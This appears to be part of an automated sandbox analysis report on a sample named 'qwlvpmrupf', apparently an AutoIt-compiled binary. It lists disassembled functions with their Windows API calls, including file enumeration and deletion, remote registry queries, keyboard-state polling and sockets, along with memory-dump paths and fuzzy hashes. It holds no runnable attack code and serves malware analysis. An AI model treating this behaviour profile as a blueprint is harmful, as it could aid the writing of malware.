                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4a13e5e3d3dd7bf8307b490ddc6f17afebb2688e115b22d9ac43136f8e1ccce8
                                                • Instruction ID: 900b6aac81381dc0e936a85b83aae7149060a4c0d65918a5c153e984ab77cd24
                                                • Opcode Fuzzy Hash: 4a13e5e3d3dd7bf8307b490ddc6f17afebb2688e115b22d9ac43136f8e1ccce8
                                                • Instruction Fuzzy Hash: D6D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014010BE1866020C732E821AB94
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 272a5494cee8beb07b8ef7c2b87cafbff3f10931ed11ae079ce0c54cda6aff46
                                                • Instruction ID: e77444e7d7fa8e497d19cebb0e8c03ec8ec91793587e34a54a90b3bd26cbefba
                                                • Opcode Fuzzy Hash: 272a5494cee8beb07b8ef7c2b87cafbff3f10931ed11ae079ce0c54cda6aff46
                                                • Instruction Fuzzy Hash: EFB0922500261005BD792AB82A281A92B0068433A67DD1BEAE4B9A92E3C33D880BE610
                                                APIs
                                                  • Part of subcall function 003DDB69: FindFirstFileW.KERNELBASE(?,?), ref: 003DDBE0
                                                  • Part of subcall function 003DDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 003DDC30
                                                  • Part of subcall function 003DDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 003DDC41
                                                  • Part of subcall function 003DDB69: FindClose.KERNEL32(00000000), ref: 003DDC58
                                                • GetLastError.KERNEL32 ref: 003E6583
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                • String ID:
                                                • API String ID: 2191629493-0
                                                • Opcode ID: b76c38f0073fc0fb3ed153dd5c7a8a056d724a082f0e7b5b7f365ba519470ca8
                                                • Instruction ID: 241a01ddb55ea56c5c2a62a3b91d1a88876c8ea9411ab6be74197db24fce5d10
                                                • Opcode Fuzzy Hash: b76c38f0073fc0fb3ed153dd5c7a8a056d724a082f0e7b5b7f365ba519470ca8
                                                • Instruction Fuzzy Hash: 2DF08C323002108FCB21EF59D845B6AB7E5AF58360F058059F90A9B3A2CB74BC018B94
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00000000,003B3A1C), ref: 00377973
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 68594d60a07a7649114ab02569ed261ff36b83991d54c10f2e1409769d15d8a1
                                                • Instruction ID: 7107d53eef1456d63ca5262590c7c1c30bc8e400d7e8bd0a3aa243aa5ff5cf03
                                                • Opcode Fuzzy Hash: 68594d60a07a7649114ab02569ed261ff36b83991d54c10f2e1409769d15d8a1
                                                • Instruction Fuzzy Hash: A4E0B675805B12CFC3324F1AE904412FBF8FFD23A13218A2ED5E9926A0D3B4589ACB50
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003EA11B
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 003EA176
                                                • FindClose.KERNEL32(00000000), ref: 003EA181
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 003EA19D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003EA1ED
                                                • SetCurrentDirectoryW.KERNEL32(00437B94), ref: 003EA20B
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003EA215
                                                • FindClose.KERNEL32(00000000), ref: 003EA222
                                                • FindClose.KERNEL32(00000000), ref: 003EA232
                                                  • Part of subcall function 003DE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003DE2C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: f06f8451b4f89ab1abf233e273f338089ff78a43c5eea8a67f9782fab4b5050c
                                                • Instruction ID: aa7f81db468c1efff3aa8268e74aab170f557ba2574010f0106737b1e30a4586
                                                • Opcode Fuzzy Hash: f06f8451b4f89ab1abf233e273f338089ff78a43c5eea8a67f9782fab4b5050c
                                                • Instruction Fuzzy Hash: AD315931500A6D6BCF12AFA1DC48ADE77AC9F05320F1102A6E911F30D2DB35EE88CB65
                                                APIs
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC89D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 003FC908
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC92C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003FC98B
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003FCA46
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCAB3
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCB48
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 003FCB99
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 003FCC42
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003FCCE1
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FCCEE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 3102970594-0
                                                • Opcode ID: ef9c76554dc434fa72b045c75e803a774eb2686da387e91dffed1e76f43cd698
                                                • Instruction ID: e16711da4f1807c57855f8ba1ebb4c01b1911022c1088c99dc255ae0aaa512e1
                                                • Opcode Fuzzy Hash: ef9c76554dc434fa72b045c75e803a774eb2686da387e91dffed1e76f43cd698
                                                • Instruction Fuzzy Hash: 3B025B716142089FD715CF24C995E3ABBE5EF48308F09849DE94ACF2A2DB31ED46CB91
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 003DA572
                                                • GetAsyncKeyState.USER32(000000A0), ref: 003DA5F3
                                                • GetKeyState.USER32(000000A0), ref: 003DA60E
                                                • GetAsyncKeyState.USER32(000000A1), ref: 003DA628
                                                • GetKeyState.USER32(000000A1), ref: 003DA63D
                                                • GetAsyncKeyState.USER32(00000011), ref: 003DA655
                                                • GetKeyState.USER32(00000011), ref: 003DA667
                                                • GetAsyncKeyState.USER32(00000012), ref: 003DA67F
                                                • GetKeyState.USER32(00000012), ref: 003DA691
                                                • GetAsyncKeyState.USER32(0000005B), ref: 003DA6A9
                                                • GetKeyState.USER32(0000005B), ref: 003DA6BB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 6754962e5bfc7a9d31a994ee6144d81eacd5302f7255fc07e6d908a0b2c220a3
                                                • Instruction ID: 07839f8015722c23bca46071d9b7dc9904724598a202ee665fd41f09949cb8ec
                                                • Opcode Fuzzy Hash: 6754962e5bfc7a9d31a994ee6144d81eacd5302f7255fc07e6d908a0b2c220a3
                                                • Instruction Fuzzy Hash: 6B41D872908FC9ADFF334B60AA043A5BEA16B12344F09405BD5C65A7C1DBA4DDC8C757
                                                APIs
                                                • CoInitialize.OLE32 ref: 003F40D1
                                                • CoUninitialize.OLE32 ref: 003F40DC
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00410B44,?), ref: 003F4136
                                                • IIDFromString.OLE32(?,?), ref: 003F41A9
                                                • VariantInit.OLEAUT32(?), ref: 003F4241
                                                • VariantClear.OLEAUT32(?), ref: 003F4293
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 636576611-1287834457
                                                • Opcode ID: be2febf5c523f21f0cbd44a4e0204510d126827bc3f9409b6792f63c33a11e46
                                                • Instruction ID: 5ba1def5333ab994c92a798d969cd5b01a61a54d10e5a7d599c1720da722897b
                                                • Opcode Fuzzy Hash: be2febf5c523f21f0cbd44a4e0204510d126827bc3f9409b6792f63c33a11e46
                                                • Instruction Fuzzy Hash: AC61D171204305AFC312DF64D888F6BBBE8AF49714F10485DF6859B2A1D770ED88CB92
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003EA4D5
                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003EA5E8
                                                  • Part of subcall function 003E41CE: GetInputState.USER32 ref: 003E4225
                                                  • Part of subcall function 003E41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E42C0
                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003EA505
                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003EA5D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                • String ID: *.*
                                                • API String ID: 1972594611-438819550
                                                • Opcode ID: 7d62ad1c689d3552c0684a738aa1016047f008281ee52ebcd21bd245f47ed04b
                                                • Instruction ID: a210c28237ac8fb858d5a39b9e5e16feec600b6325e52366de15b5e02835411a
                                                • Opcode Fuzzy Hash: 7d62ad1c689d3552c0684a738aa1016047f008281ee52ebcd21bd245f47ed04b
                                                • Instruction Fuzzy Hash: 3241B07190065AAFCF22DFA5CC49BEEBBB4EF06310F208156E445A61D1D734AE88CF61
                                                APIs
                                                • DefDlgProcW.USER32(?,?), ref: 003722EE
                                                • GetSysColor.USER32(0000000F), ref: 003723C3
                                                • SetBkColor.GDI32(?,00000000), ref: 003723D6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Color$Proc
                                                • String ID:
                                                • API String ID: 929743424-0
                                                • Opcode ID: 1f4d0e7cdb4bdcebfae6dd4dc661df6f327876d6921662a5d281460b313d446b
                                                • Instruction ID: 68a452a8c71d2469b85fb664d1ac6732953d23bd2fbd988eb577a2b662328a32
                                                • Opcode Fuzzy Hash: 1f4d0e7cdb4bdcebfae6dd4dc661df6f327876d6921662a5d281460b313d446b
                                                • Instruction Fuzzy Hash: 4B8148F4204464BAF63B663D8C99EBF155DDB46308F16811EF206D5ED2CA2DCE01D23A
                                                APIs
                                                  • Part of subcall function 003F39AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003F39D7
                                                  • Part of subcall function 003F39AB: _wcslen.LIBCMT ref: 003F39F8
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003F21BA
                                                • WSAGetLastError.WSOCK32 ref: 003F21E1
                                                • bind.WSOCK32(00000000,?,00000010), ref: 003F2238
                                                • WSAGetLastError.WSOCK32 ref: 003F2243
                                                • closesocket.WSOCK32(00000000), ref: 003F2272
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 1601658205-0
                                                • Opcode ID: 4496150f0379646689bb7c22247d38c2d82bc29eef0b249b4277ff1dd4bd9f5d
                                                • Instruction ID: 395e9d0e9d2f8b69e751b7638104996e23fa9e2dc904e29f9b7ee5057f3c67b1
                                                • Opcode Fuzzy Hash: 4496150f0379646689bb7c22247d38c2d82bc29eef0b249b4277ff1dd4bd9f5d
                                                • Instruction Fuzzy Hash: 3C51C475A00204AFD721EF64C886F6A77E5AB44714F05C09CFA19AF3D3D774AD428BA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: fb0e6441e23745c5b9af9b45073bfecd3b83a6026e44cdf902dca0a7e44840c5
                                                • Instruction ID: ef295562923d7db8845fbdfedcfe68311c740295b3e66b3df3181408527d8bb4
                                                • Opcode Fuzzy Hash: fb0e6441e23745c5b9af9b45073bfecd3b83a6026e44cdf902dca0a7e44840c5
                                                • Instruction Fuzzy Hash: F121F6317002005FD7119F16CD58B177B95EF94314F18847AE849AB3D1DBBADC42CB98
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 003DEBDC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: mouse_event
                                                • String ID:
                                                • API String ID: 2434400541-0
                                                • Opcode ID: c73e0df196e42ed09aaad7e9fdf42607525cde4a8181cc39f7cf01387ef28824
                                                • Instruction ID: ef3cfb1e51c1272f5d279dd4977662d6bbaffd2de62e68de38f16eac737aa6c3
                                                • Opcode Fuzzy Hash: c73e0df196e42ed09aaad7e9fdf42607525cde4a8181cc39f7cf01387ef28824
                                                • Instruction Fuzzy Hash: A4D017B719820178E81B2AB8AD2FF760E08E301751F46066BB203DDB94E4E5B900A126
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0037259A
                                                • GetSystemMetrics.USER32(00000007), ref: 003725A2
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003725CD
                                                • GetSystemMetrics.USER32(00000008), ref: 003725D5
                                                • GetSystemMetrics.USER32(00000004), ref: 003725FA
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00372617
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00372627
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0037265A
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0037266E
                                                • GetClientRect.USER32(00000000,000000FF), ref: 0037268C
                                                • GetStockObject.GDI32(00000011), ref: 003726A8
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 003726B3
                                                  • Part of subcall function 003719CD: GetCursorPos.USER32(?), ref: 003719E1
                                                  • Part of subcall function 003719CD: ScreenToClient.USER32(00000000,?), ref: 003719FE
                                                  • Part of subcall function 003719CD: GetAsyncKeyState.USER32(00000001), ref: 00371A23
                                                  • Part of subcall function 003719CD: GetAsyncKeyState.USER32(00000002), ref: 00371A3D
                                                • SetTimer.USER32(00000000,00000000,00000028,0037199C), ref: 003726DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 05c3ebba0cef704bccb90784eddb9873bc29523acb638526571e2e0e015ab12c
                                                • Instruction ID: 24e7316a1542ef50b5b3fd116fe6f9a6e58acd4bf534f487cce57de7e7a33c79
                                                • Opcode Fuzzy Hash: 05c3ebba0cef704bccb90784eddb9873bc29523acb638526571e2e0e015ab12c
                                                • Instruction Fuzzy Hash: C1B1BA75A00209AFDB15DFA8CD45BAE7BB4FB48314F018229FA19EB290DBB4D900CB55
                                                APIs
                                                • _wcslen.LIBCMT ref: 00408CB9
                                                • _wcslen.LIBCMT ref: 00408CCD
                                                • _wcslen.LIBCMT ref: 00408CF0
                                                • _wcslen.LIBCMT ref: 00408D13
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00408D51
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00403F79,?), ref: 00408DAD
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00408DE6
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00408E29
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00408E60
                                                • FreeLibrary.KERNEL32(?), ref: 00408E6C
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00408E7C
                                                • DestroyIcon.USER32(?), ref: 00408E8B
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00408EA8
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00408EB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                • String ID: .dll$.exe$.icl$y?@
                                                • API String ID: 799131459-1101282622
                                                • Opcode ID: 23b7e185b09102804edd2b40f47971d14620f77cfca06885ec8ca3fbafdc7f39
                                                • Instruction ID: 5127e08bb869c6af3cbe27571f6ef761d38680409d429fac127f2a1e050347fe
                                                • Opcode Fuzzy Hash: 23b7e185b09102804edd2b40f47971d14620f77cfca06885ec8ca3fbafdc7f39
                                                • Instruction Fuzzy Hash: FE61DE71900215BEEB149B64CD45FBF77A8AF08710F10862AFD55EA1D1DB789A80CBA4
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 003E4852
                                                • _wcslen.LIBCMT ref: 003E485D
                                                • _wcslen.LIBCMT ref: 003E48B4
                                                • _wcslen.LIBCMT ref: 003E48F2
                                                • GetDriveTypeW.KERNEL32(?), ref: 003E4930
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E4978
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E49B3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E49E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
